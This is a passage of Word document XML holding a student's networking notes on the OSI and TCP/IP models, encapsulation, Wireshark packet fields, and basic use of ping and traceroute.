        <w:t>. Tracks communications between the host and receiving computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C9B820" w14:textId="324ECD54" w:rsidR="00B668E5" w:rsidRPr="0084205E" w:rsidRDefault="00B668E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Layer 4 – Transport – choose protocol over which the data is to be transmitted, commonly TCP or UDP. TCP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>connection-based</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>, UDP connectionless. Accuracy versus speed, respectively. Once protocol is selected, data is divided into segments or datagrams (TCP vs UDP) for transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1427CE15" w14:textId="7CDFD074" w:rsidR="00B668E5" w:rsidRPr="0084205E" w:rsidRDefault="00B668E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 3 – Network – responsible for locating destination of request, best route to take. Use of logical addressing (IPv4, software based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CF6FD" w14:textId="383EC3CA" w:rsidR="00B668E5" w:rsidRPr="0084205E" w:rsidRDefault="00B668E5" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Layer 2 – Data </w:t>
      </w:r>
      <w:r w:rsidR="006A4F0B" w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A4F0B" w:rsidRPr="0084205E">
        <w:t>focuses on physical addressing of the transmission. Receives packet from network layer (including IP of receiving) and adds in MAC of receiver endpoint via NIC. Presents data in a format suitable for transmission. Checks received information to make sure it hasn’t been corrupted during transmission, which occurs over Layer 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE9F552" w14:textId="7D764B21" w:rsidR="006A4F0B" w:rsidRPr="0084205E" w:rsidRDefault="006A4F0B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 1 – Physical – hardware of computer. Convert the binary data of the transmissions into signals and transmit them across the network, as well as receiving incoming signals and converting them back into binary data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2D3EFA" w14:textId="4C6BFF08" w:rsidR="006A4F0B" w:rsidRPr="0084205E" w:rsidRDefault="006A4F0B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623B151" w14:textId="1FB196D2" w:rsidR="006A4F0B" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>As data passes down each layer of the model, more information specific to each layer is added on to the start of the transmission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF3AF3B" w14:textId="68FB0B2E" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Network layer header would include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>dst</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8E2F1" w14:textId="3A5CCBC4" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transport layer header would include protocol-specific info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501EC48" w14:textId="5EC59D48" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Data link layer adds end piece to verify data has not been corrupted on transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2FBF5A" w14:textId="28452336" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cannot be intercepted/tampered without breaking trailer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F64987E" w14:textId="7B8AB1F5" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA02EF" w14:textId="1CDF12A4" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layers 7, 6, 5 – data is data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAD3D4" w14:textId="31EE1694" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 4 (TRANSPORT) – data is segment or datagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4F7E5" w14:textId="429892C8" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 3 (NETWORK) – data is a packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7243C9AF" w14:textId="62F6580C" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 2 (DATA) – data is a frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9CA3F8" w14:textId="57D9E6F9" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Layer 1 (PHYSICAL) – data broken down into bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7ECAA7" w14:textId="6BE50D3A" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process is reversed at receiving endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39622E" w14:textId="7C501A8D" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>De-encapsulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28178378" w14:textId="5E20C524" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Gives standardized method of sending data and adds security layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37F17D" w14:textId="1EF3FF37" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00DB29BE" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The TCP/IP Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1192B2F5" w14:textId="5FC8130E" w:rsidR="00DB29BE" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Serves as basis for real-world networking, (OSI theoretical framework)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7239CF9D" w14:textId="0391E490" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Application = OSI (Application, Presentation, Session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A12940" w14:textId="36D837F6" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transports = OSI (Transport)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E325A11" w14:textId="0AB0DAAE" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Internet = OSI (Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054FA95C" w14:textId="198FF3C7" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network = OSI (Data Link, Physical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4287DE27" w14:textId="407AD39B" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>The Practical Side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4314B18F" w14:textId="4E460223" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCP/IP is a suite of protocols (Two most important being TCP and IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCEAE7" w14:textId="01F51C6A" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCP – connection-based protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FC31C" w14:textId="02E757FF" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Three-way handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00278C16" w14:textId="4D4FACA6" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>SYN-SYN/ACK-ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049F42E3" w14:textId="058438DE" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Introduced by DoD in 1982 (TCP/IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8644BC" w14:textId="2A349062" w:rsidR="00C73D90" w:rsidRPr="0084205E" w:rsidRDefault="00C73D90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">OSI </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> International Organization for Standardization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D93C68F" w14:textId="1B096A7F" w:rsidR="00182654" w:rsidRPr="0084205E" w:rsidRDefault="00182654" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534751D8" w14:textId="315F0839" w:rsidR="00182654" w:rsidRPr="0084205E" w:rsidRDefault="00182654" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Analyze captured packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB4C79" w14:textId="42ED0C97" w:rsidR="00182654" w:rsidRPr="0084205E" w:rsidRDefault="00182654" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Five core pieces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B08D8CC" w14:textId="69E5E4A6" w:rsidR="00182654" w:rsidRPr="0084205E" w:rsidRDefault="00182654" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Frame 1 – showing details from physical layer of the OSI model (Network Interface of TCP/IP) – packet size in terms of bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381AC91" w14:textId="0F3F2F32" w:rsidR="00182654" w:rsidRPr="0084205E" w:rsidRDefault="00182654" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ethernet II – details from Data Link layer of the OSI model (Network Interface layer of TCP/IP model), transmission medium (ethernet)</w:t>
      </w:r>
      <w:r w:rsidR="00AC284B" w:rsidRPr="0084205E">
        <w:t>, source and destination MAC addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602519B" w14:textId="1759FD32" w:rsidR="00AC284B" w:rsidRPr="0084205E" w:rsidRDefault="00AC284B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Internet Protocol Version 4 – details of Network Layer of OSI (Internet Layer of TCP/IP), source and destination IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72533323" w14:textId="4772E409" w:rsidR="00AC284B" w:rsidRPr="0084205E" w:rsidRDefault="00AC284B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Transmission Control Protocol, User Datagram Protocol – details from Transport Layer of OSI and TCP/IP models. Which protocol (TCP or UDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AE21AD" w14:textId="0E4C9002" w:rsidR="00AC284B" w:rsidRPr="0084205E" w:rsidRDefault="00AC284B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Hypertext Transfer Protocol, Domain Name System – details from the Application Layer of OSI and TCP/IP models. GET/POST requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164D3B5D" w14:textId="0E7D797B" w:rsidR="00AC284B" w:rsidRPr="0084205E" w:rsidRDefault="00AC284B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAA2B03" w14:textId="1A171A2E" w:rsidR="00AC284B" w:rsidRPr="0084205E" w:rsidRDefault="006414E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Test connection to a remote resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0354229E" w14:textId="00231131" w:rsidR="006414E7" w:rsidRPr="0084205E" w:rsidRDefault="006414E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uses ICMP protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C572E4F" w14:textId="307AF5C6" w:rsidR="006414E7" w:rsidRPr="0084205E" w:rsidRDefault="006414E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Works on network layer of OSI and internet layer of TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783377A1" w14:textId="72F234D2" w:rsidR="006414E7" w:rsidRPr="0084205E" w:rsidRDefault="006414E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ping &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E14543" w14:textId="525839B3" w:rsidR="006414E7" w:rsidRPr="0084205E" w:rsidRDefault="006414E7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Determines IP if domain name is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> or URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAA6ED5" w14:textId="6373663C" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switch -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> changes interval timing between pings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25FAFD" w14:textId="6B63C160" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Switch -4 sets to IPv4 only, -6 sets to IPv6 only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE6BFE" w14:textId="5B03C8AA" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Traceroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6D04B" w14:textId="15493E9C" w:rsidR="005F4D72" w:rsidRPr="0084205E" w:rsidRDefault="005F4D72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Map path requests take as it heads to target machine</w:t>
      </w:r>
    </w:p>
